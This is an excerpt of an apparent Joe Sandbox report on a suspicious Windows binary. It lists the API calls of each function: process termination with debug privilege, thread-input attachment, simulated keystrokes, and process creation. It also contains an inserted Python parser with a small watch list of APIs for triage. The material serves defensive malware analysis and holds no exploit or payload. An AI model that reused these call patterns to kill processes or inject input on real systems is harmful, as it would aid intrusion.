                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: edcceb0c0fda6984eebccad5c32f8723a4d68f9dcd879ca3af9439a14f4bd6ae
                                                            • Instruction ID: 4ad6c75ab21fb1115b0602f91cf0e57ec233c31c71f63e9343ccaf143f9214f4
                                                            • Opcode Fuzzy Hash: edcceb0c0fda6984eebccad5c32f8723a4d68f9dcd879ca3af9439a14f4bd6ae
                                                            • Instruction Fuzzy Hash: 025165B20187855BC724EB50DC819DFB7ECAF95300F00492EF289D3192EF74A6988B66
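Every function listing on this page has the same fixed layout (an "APIs" list of `Name.MODULE(args), ref: address` lines, optionally prefixed with "Part of subcall function", followed by "Memory Dump Source" and a "Similarity" key/value list). The Python below is an added example, not code from the Joe Sandbox report or from the AutoIt runtime it disassembles: a parser for that layout so the call sequences can be diffed, searched, or turned into hunting rules instead of being read by eye. The embedded SAMPLE text is copied, abbreviated, from three blocks on this page (the AttachThreadInput, CreateProcessW, and MoveFileW listings); the WATCH table is an assumed triage choice of my own, not something the report states.

```python
"""Parse the per-function "APIs" / "Similarity" blocks of a Joe Sandbox report.

Added example, not code from the Joe Sandbox report or the AutoIt runtime it
disassembles. SAMPLE is copied (abbreviated) from three blocks on this page;
the WATCH table is an assumed triage choice, not something the report states."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00201700
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00200778,?,00000001), ref: 00201714
• GetWindowThreadProcessId.USER32(00000000), ref: 0020171B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 0020172A
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017CC
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 649da43740c28651e2ecad4871c9d816c1827ca3e7588d24fa14106b9627bada
APIs
• _memset.LIBCMT ref: 0021F9C9
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021FD5E
• CloseHandle.KERNEL32(?), ref: 0021FDBF
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• Opcode ID: 147aa02ce7a47d90657f59f2e07258f602276eb1473ac6a78ca9facebb20f098
APIs
  • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002038D3,?), ref: 002048C7
  • Part of subcall function 00204CD3: GetFileAttributesW.KERNEL32(?,00203947), ref: 00204CD4
• lstrcmpiW.KERNEL32(?,?), ref: 00204FE2
• _wcscmp.LIBCMT ref: 00204FFC
• MoveFileW.KERNEL32(?,?), ref: 00205017
Similarity
• Opcode ID: edcceb0c0fda6984eebccad5c32f8723a4d68f9dcd879ca3af9439a14f4bd6ae
"""

# One API line: optional subcall prefix, Name.MODULE, optional "(args)", call-site address after "ref:".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple                        # argument cells as printed; "?" means unresolved
    ref: int                           # call-site address
    subcall_of: "int | None" = None    # callee address when listed as "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    @property
    def opcode_id(self) -> str:
        return self.similarity.get("Opcode ID", "")

    def direct_api_names(self) -> set:
        """APIs called by this function itself, excluding those attributed to its subcalls."""
        return {c.name for c in self.calls if c.subcall_of is None}


def parse_report(text: str) -> list:
    """Split report text into FunctionBlocks; a block starts at each 'APIs' header."""
    blocks, section = [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if line in SECTIONS:
            section = line
            if line == "APIs":
                blocks.append(FunctionBlock())
        elif not blocks or not line:
            continue  # text before the first block is not a function listing
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = tuple(m["args"].split(",")) if m["args"] else ()
            sub = int(m["sub"], 16) if m["sub"] else None
            blocks[-1].calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
        elif section == "Similarity" and (m := KV_LINE.match(line)):
            blocks[-1].similarity[m["key"].strip()] = m["value"].strip()
    return blocks


def api_sequence(block: FunctionBlock) -> list:
    """Direct calls in address order, the shape a fuzzy signature is built from."""
    return [c.name for c in sorted(block.calls, key=lambda c: c.ref) if c.subcall_of is None]


def flag_blocks(blocks: list, watch: dict) -> list:
    """(opcode_id, [matched APIs]) for each block that directly calls a watched API."""
    hits = [(b.opcode_id, sorted(b.direct_api_names() & set(watch))) for b in blocks]
    return [(oid, apis) for oid, apis in hits if apis]


WATCH = {  # assumed triage list of APIs worth a second look in this sample
    "CreateProcessW": "spawns a child process",
    "AttachThreadInput": "joins another thread's input queue (focus/keyboard state)",
    "CreateIconFromResourceEx": "builds an icon from an embedded resource",
}

if __name__ == "__main__":
    for opcode_id, apis in flag_blocks(parse_report(SAMPLE), WATCH):
        print(opcode_id[:16], ", ".join(f"{a}: {WATCH[a]}" for a in apis))
```

Run against the full report text, `flag_blocks` returns the Opcode IDs of the functions that call the watched APIs, which is the stable key to cite when correlating with other sandbox runs; `api_sequence` gives the ordered call list that the "API ID" and fuzzy-hash fields summarise. Calls listed as "Part of subcall function" are kept but tagged with the callee address, so a function is not credited with APIs that only its callees invoke.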
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0022896E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 6ee86bc1c1609625d5a55ff14cad05494c838f0da342d3bd8338771d9d8937ab
                                                            • Instruction ID: 88c303fe31a0dd45bfcbede9945c6fe7609cb4b4cc0717ff21f107524d61a956
                                                            • Opcode Fuzzy Hash: 6ee86bc1c1609625d5a55ff14cad05494c838f0da342d3bd8338771d9d8937ab
                                                            • Instruction Fuzzy Hash: 1151DB30521229BFDF309FA8EC89BA97B65FF15310F504122F511E66A1DFB1E9A0DB41
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001DC547
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001DC569
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001DC581
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001DC59F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001DC5C0
                                                            • DestroyIcon.USER32(00000000), ref: 001DC5CF
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001DC5EC
                                                            • DestroyIcon.USER32(?), ref: 001DC5FB
                                                              • Part of subcall function 0022A71E: DeleteObject.GDI32(00000000), ref: 0022A757
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 22d7c9234b1d5dd60baafbacb026d46297db2920ae2524292be26f35d0589ea4
                                                            • Instruction ID: 082f748d346a386383bbc24292adb8e932eaef813d23156997ee766d8bb083a8
                                                            • Opcode Fuzzy Hash: 22d7c9234b1d5dd60baafbacb026d46297db2920ae2524292be26f35d0589ea4
                                                            • Instruction Fuzzy Hash: DF515F74A00206EFDB24DF68EC49FAA77B5EB55320F104529F912D72A0D7B0ED91DBA0
                                                            APIs
                                                              • Part of subcall function 001FAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 001FAE77
                                                              • Part of subcall function 001FAE57: GetCurrentThreadId.KERNEL32 ref: 001FAE7E
                                                              • Part of subcall function 001FAE57: AttachThreadInput.USER32(00000000,?,001F9B65,?,00000001), ref: 001FAE85
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F9B70
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001F9B8D
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001F9B90
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F9B99
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001F9BB7
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001F9BBA
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F9BC3
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001F9BDA
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001F9BDD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: d5a1b8bbe2edf694e259af79357ba39b9e8c974147688906b95d57b0e6b3fa7d
                                                            • Instruction ID: 8091c9dad0e103a832a43b33d765fb33a6801a16472a92980ffcebdd38e6d579
                                                            • Opcode Fuzzy Hash: d5a1b8bbe2edf694e259af79357ba39b9e8c974147688906b95d57b0e6b3fa7d
                                                            • Instruction Fuzzy Hash: 6211E571550218BEF6206BA0EC4DFBA3B2DDF4C751F511425F758AB0A0CAF25C21DAA4
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,001F8A84,00000B00,?,?), ref: 001F8E0C
                                                            • HeapAlloc.KERNEL32(00000000,?,001F8A84,00000B00,?,?), ref: 001F8E13
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001F8A84,00000B00,?,?), ref: 001F8E28
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,001F8A84,00000B00,?,?), ref: 001F8E30
                                                            • DuplicateHandle.KERNEL32(00000000,?,001F8A84,00000B00,?,?), ref: 001F8E33
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,001F8A84,00000B00,?,?), ref: 001F8E43
                                                            • GetCurrentProcess.KERNEL32(001F8A84,00000000,?,001F8A84,00000B00,?,?), ref: 001F8E4B
                                                            • DuplicateHandle.KERNEL32(00000000,?,001F8A84,00000B00,?,?), ref: 001F8E4E
                                                            • CreateThread.KERNEL32(00000000,00000000,001F8E74,00000000,00000000,00000000), ref: 001F8E68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: f3bb3c2f1c8a57d11a1010f9de3f84852c77f368c82b5d67a5fba70f3a5f0d22
                                                            • Instruction ID: fece41498086395f95d95b0a442d5629ff8cdb47f67e0f1d7f2619a3c236f6b9
                                                            • Opcode Fuzzy Hash: f3bb3c2f1c8a57d11a1010f9de3f84852c77f368c82b5d67a5fba70f3a5f0d22
                                                            • Instruction Fuzzy Hash: EA01BF75640308FFE760ABA5ED4EF6B3B6CEB89711F405421FA09DB191CA709C11CB20
                                                            APIs
                                                              • Part of subcall function 001F7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?,?,001F799D), ref: 001F766F
                                                              • Part of subcall function 001F7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F768A
                                                              • Part of subcall function 001F7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F7698
                                                              • Part of subcall function 001F7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?), ref: 001F76A8
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00219B1B
                                                            • _memset.LIBCMT ref: 00219B28
                                                            • _memset.LIBCMT ref: 00219C6B
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00219C97
                                                            • CoTaskMemFree.OLE32(?), ref: 00219CA2
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00219CF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: 9d7a48121aef74222e6d0da9884f49e3ca326e4072b996794db7f36b92bac870
                                                            • Instruction ID: f1648a7dcfc1b6be44703b8c064acad38624d06527e333141229f2754ab6f3f7
                                                            • Opcode Fuzzy Hash: 9d7a48121aef74222e6d0da9884f49e3ca326e4072b996794db7f36b92bac870
                                                            • Instruction Fuzzy Hash: 30916A71D00219EBDB10DFA4DC94EDEBBB9AF18710F20416AF519A7281DB719A94CFA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00227093
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 002270A7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002270C1
                                                            • _wcscat.LIBCMT ref: 0022711C
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00227133
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00227161
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 71720635b5ceebff96e92c381952413d3d3f6fdedeb71a8b6b18db975ab12ed9
                                                            • Instruction ID: b026e25d82cfcc572fb9fac54d09567111b60a41eb2353647eea3dd45927c159
                                                            • Opcode Fuzzy Hash: 71720635b5ceebff96e92c381952413d3d3f6fdedeb71a8b6b18db975ab12ed9
                                                            • Instruction Fuzzy Hash: 4241B471918319BFEB219FA4DC89FEE77B8EF08350F10042AF544A7191D7719D988B50
                                                            APIs
                                                              • Part of subcall function 00203E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00203EB6
                                                              • Part of subcall function 00203E91: Process32FirstW.KERNEL32(00000000,?), ref: 00203EC4
                                                              • Part of subcall function 00203E91: CloseHandle.KERNEL32(00000000), ref: 00203F8E
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0021ECB8
                                                            • GetLastError.KERNEL32 ref: 0021ECCB
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0021ECFA
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0021ED77
                                                            • GetLastError.KERNEL32(00000000), ref: 0021ED82
                                                            • CloseHandle.KERNEL32(00000000), ref: 0021EDB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 3cc1d3dd795c119cad8f4d673c71a29dc2c47b6638393d37b52e86384515fd1b
                                                            • Instruction ID: d3ec57299cf9278f82ce86dfb5f874e8fe98fa4f5b26e511932d915e893904b0
                                                            • Opcode Fuzzy Hash: 3cc1d3dd795c119cad8f4d673c71a29dc2c47b6638393d37b52e86384515fd1b
                                                            • Instruction Fuzzy Hash: 5941E031210201AFCB20EF24DC95FBEB7E4AF61714F08805DF9429B2D2DBB5A855CB92
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 002032C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: 2d065d39d359c0818afa74967daccbdc0b1cf3f58c085cb79053a947a8950807
                                                            • Instruction ID: 1d9966072d57be16b3294b9bdd41a397ded3937168ff0430cf7e7593f8582131
                                                            • Opcode Fuzzy Hash: 2d065d39d359c0818afa74967daccbdc0b1cf3f58c085cb79053a947a8950807
                                                            • Instruction Fuzzy Hash: 8B110535238347BEE7019E55DC43D6AB79CDF2A760F20402AFD00A61C2E7B19F6045A5
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0020454E
                                                            • LoadStringW.USER32(00000000), ref: 00204555
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0020456B
                                                            • LoadStringW.USER32(00000000), ref: 00204572
                                                            • _wprintf.LIBCMT ref: 00204598
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002045B6
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00204593
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: dfb14fe1de5b96935887846728af6701611f7633f56782d4fa9917dfee63af90
                                                            • Instruction ID: 0b8cfe983ef5300bfbaf09cd278f7839c4655526517bd004a5dcae99e5be39ae
                                                            • Opcode Fuzzy Hash: dfb14fe1de5b96935887846728af6701611f7633f56782d4fa9917dfee63af90
                                                            • Instruction Fuzzy Hash: CC0171F2400208BBE760ABD4EE89EF6777CE708301F4004B5BB09E2051E6709E954B70
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0022D78A
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0022D7AA
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0022D9E5
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0022DA03
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0022DA24
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0022DA43
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0022DA68
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0022DA8B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 9e0ab1a9954ae395bab829c56b25f42fc986ea90eb7013a66f5248e8ed74aaea
                                                            • Instruction ID: 2aac26c69f68d5574395b0e09274419a5f0c8131de7307903ee19c99ea1fbf58
                                                            • Opcode Fuzzy Hash: 9e0ab1a9954ae395bab829c56b25f42fc986ea90eb7013a66f5248e8ed74aaea
                                                            • Instruction Fuzzy Hash: 47B17A71610226EFDF14CFA8D989BBD7BB1FF44701F088069EC489B295D774A9A0CB90
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000), ref: 001A2ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000,000000FF), ref: 001A2B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000), ref: 001DC46A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000), ref: 001DC4D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0020737F
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002073B6
                                                            • EnterCriticalSection.KERNEL32(?), ref: 002073D2
                                                            • _memmove.LIBCMT ref: 00207420
                                                            • _memmove.LIBCMT ref: 0020743D
